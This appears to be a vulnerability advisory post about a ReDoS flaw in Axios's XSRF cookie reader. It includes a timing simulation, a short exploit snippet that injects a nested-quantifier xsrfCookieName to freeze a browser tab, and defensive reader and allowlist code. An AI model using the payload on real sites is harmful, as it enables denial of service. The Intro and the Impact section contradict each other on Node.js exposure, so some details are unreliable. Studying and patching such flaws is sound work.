Intro
The vulnerability arises from how Axios constructs a regular expression to parse the browser’s `document.cookie` when reading a specific cookie. In affected versions, the cookie name (e.g., from the `xsrfCookieName` configuration) is directly concatenated into a regex pattern without escaping special characters.
When a request is made in a browser, Axios automatically looks for an XSRF token in cookies. To do this it builds a regex like `new RegExp('(?:^|; )' + name + '=([^;])')`. Because `name` is not escaped, an attacker who can control the value of `xsrfCookieName` can inject regex metacharacters. A specially crafted name such as `(.+)+$` or `(([^;])+)+\\$` creates "nested quantifiers" (`+` or `*` operators nested inside each other).
When the regex engine tries to match this pattern against the cookie string, it causes "catastrophic backtracking" – an exponential explosion of possible matching paths. Even a moderate-length cookie string (approx. 20–30 characters) can force the engine to consume millions of operations, freezing the browser tab for seconds or minutes. The impact is pure Denial of Service (availability), with no data leakage or request modification. It only affects standard browser environments where Axios reads `document.cookie`; Node.js, React Native, and web workers are not impacted. The vulnerability was fixed by removing dynamic regex construction entirely, replacing it with simple string splitting and equality comparison.
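As an added example (not code from Axios or from this post), the two reader shapes side by side: the regex-concatenation reader the Intro describes, with the value group written as `[^;]*`, and a split-and-compare reader of the kind the fix adopted. The cookie string and the function names `readCookieRegex` / `readCookieSafe` are constructed for this demonstration.

```javascript
// Added example, not Axios's own code: the regex-concatenation cookie reader
// described in the Intro next to a split-and-compare reader of the kind the
// fix adopted. The cookie string below is constructed for the demonstration.
const SAMPLE_COOKIE = 'theme=dark; XSRF-TOKEN=abc%2F123; session=zzz';

// Vulnerable shape: `name` is concatenated into the pattern unescaped, so any
// regex metacharacter in it changes what is matched, and nested quantifiers
// such as (.+)+ make the engine backtrack exponentially before it fails.
function readCookieRegex(name, cookieString) {
  const match = cookieString.match(new RegExp('(?:^|; )' + name + '=([^;]*)'));
  return match ? decodeURIComponent(match[1]) : null;
}

// Hardened shape: no dynamic regex at all. Split on ';', trim, split each pair
// at its first '=', and compare the name with plain string equality, so a name
// like '(.+)+$' is just a sequence of characters that matches nothing.
function readCookieSafe(name, cookieString) {
  if (typeof name !== 'string' || name.length === 0) return null;
  for (const pair of cookieString.split(';')) {
    const trimmed = pair.trim();
    const eq = trimmed.indexOf('=');
    if (eq === -1) continue;
    if (trimmed.slice(0, eq) === name) {
      const raw = trimmed.slice(eq + 1);
      try {
        return decodeURIComponent(raw);
      } catch (e) {
        return raw; // malformed percent-encoding: return the value as stored
      }
    }
  }
  return null;
}

// Stand-alone run: a benign name, a name carrying a metacharacter, and the
// pathological name from the advisory (safe reader only; it returns at once
// because no regex is ever built).
console.log(readCookieRegex('XSRF-TOKEN', SAMPLE_COOKIE)); // abc/123
console.log(readCookieRegex('XSRF.TOKEN', SAMPLE_COOKIE)); // abc/123 ('.' matched '-')
console.log(readCookieSafe('XSRF.TOKEN', SAMPLE_COOKIE));  // null
console.log(readCookieSafe('(.+)+$', 'x=' + 'a'.repeat(30) + '!')); // null
```

The second `readCookieRegex` call is the quieter half of the same bug: even without a freeze, an unescaped name changes which cookie is read, so the split-and-compare reader is the right shape regardless of performance.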
DailyCVE Form:
Platform: Web browser client
Version: Axios 0.x/1.x
Vulnerability: ReDoS via XSRF
Severity: High (7.5)
Date: June 4, 2026
Prediction: Patch already released
What Undercode Say (Analytics & Commands)
Check the installed Axios version and look for dynamic regex construction in the cookie helper (the helper is vulnerable when `name` is concatenated into the `new RegExp(...)` pattern):

```shell
npm list axios
grep -n "new RegExp(" node_modules/axios/lib/helpers/cookies.js
```
Simulate exponential backtracking (Node.js). Save the script as `redos-sim.js` and run it with `node redos-sim.js`:

```javascript
// Time the vulnerable regex construction against cookie strings of growing length.
function vulnerableRead(name, cookie) {
  const start = Date.now();
  try {
    cookie.match(new RegExp('(?:^|; )' + name + '=([^;])'));
  } catch (e) {}
  return Date.now() - start;
}
for (const n of [20, 22, 24, 26, 28]) {
  const cookie = 'x=' + 'a'.repeat(n) + '!';
  console.log(`Length ${n}: ${vulnerableRead('(.+)+$', cookie)}ms`);
}
```
Example output:

```text
Length 20: 21ms
Length 22: 84ms
Length 24: 336ms
Length 26: 1344ms
Length 28: ~5376ms
```
Analysis: Each additional 2 characters roughly quadruples execution time, confirming exponential backtracking.
Exploit:

```javascript
// Exploit: Force freeze browser tab by setting malicious xsrfCookieName
// Requires attacker control over Axios config (e.g., via prototype pollution or direct injection)
const evilName = '(([^;])+)+X' + 'X'.repeat(25); // 25+ chars triggers ~1300ms freeze
axios.defaults.xsrfCookieName = evilName; // Inject payload
axios.get('/api/data'); // Next request freezes tab
```
Real-world trigger: An attacker pollutes `Object.prototype` with `xsrfCookieName: '(.+)+$'`. Any subsequent Axios request in the victim's browser will freeze the tab.
Protection:
- Update Axios to `>=0.32.0` (0.x) or `>=1.16.0` (1.x).
- Workaround: Set `xsrfCookieName: null` in all Axios instances.
- Sanitize input: Never derive `xsrfCookieName` from untrusted data. If dynamic, validate against a strict allowlist.
- Avoid unsafe internal calls: Never call `axios/unsafe/helpers/cookies.js` directly with user input.
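An added example (not Axios's own code, and not from this post) of the "strict allowlist" item above: a resolver that accepts `xsrfCookieName` only as an own, allowlisted string property of the config and otherwise falls back to Axios's documented default or disables the lookup. `resolveXsrfCookieName`, `hardenXsrfConfig` and the allowlist pattern are this example's own names; `XSRF-TOKEN` is Axios's documented default.

```javascript
// Added example, not Axios's own code: resolve `xsrfCookieName` from a request
// config before it reaches the cookie reader, so only an allowlisted plain
// token is ever used and anything else disables the lookup (fail closed).

// Deliberately narrower than RFC 6265's cookie-name token grammar, which still
// admits regex metacharacters such as '+', '*', '.', '$' and '|'.
const SAFE_COOKIE_NAME = /^[A-Za-z0-9_-]{1,64}$/;
const DEFAULT_XSRF_COOKIE_NAME = 'XSRF-TOKEN'; // Axios's documented default

function resolveXsrfCookieName(config) {
  // Honour only an own property. A value that arrives through the prototype
  // chain (the shape an Object.prototype pollution takes) is ignored in favour
  // of the known default.
  if (config === null || typeof config !== 'object' ||
      !Object.prototype.hasOwnProperty.call(config, 'xsrfCookieName')) {
    return DEFAULT_XSRF_COOKIE_NAME;
  }
  const name = config.xsrfCookieName;
  if (name === null || name === false) return null; // lookup disabled on purpose
  if (typeof name === 'string' && SAFE_COOKIE_NAME.test(name)) return name;
  return null; // unexpected type or disallowed characters: disable rather than pass through
}

// Return a copy of the config with the resolved name written as an own property,
// ready to hand to axios.create() or a per-request call.
function hardenXsrfConfig(config) {
  return Object.assign({}, config, { xsrfCookieName: resolveXsrfCookieName(config) });
}

// Constructed inputs for a stand-alone run. `polluted` carries the name as an
// inherited property only, which is how a prototype-pollution value would look.
const polluted = Object.create({ xsrfCookieName: '(.+)+$' });
console.log(resolveXsrfCookieName({ xsrfCookieName: 'XSRF-TOKEN' })); // XSRF-TOKEN
console.log(resolveXsrfCookieName({ xsrfCookieName: '(.+)+$' }));    // null
console.log(resolveXsrfCookieName(polluted));                         // XSRF-TOKEN
console.log(hardenXsrfConfig(polluted).xsrfCookieName);               // XSRF-TOKEN
```

Returning `null` for anything outside the allowlist matches the workaround above (`xsrfCookieName: null`): a request without XSRF cookie lookup is the safer failure than a request that hands an unvetted string to the cookie helper.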
Impact:
- Client-side DoS: Freezes browser tab, blocking UI and JavaScript execution.
- Server-side DoS (SSR): Blocks Node.js event loop, making server unresponsive.
- Event loop starvation: Pauses all async operations, timers, and I/O for duration of regex evaluation.
Sources:
Reported By: github.com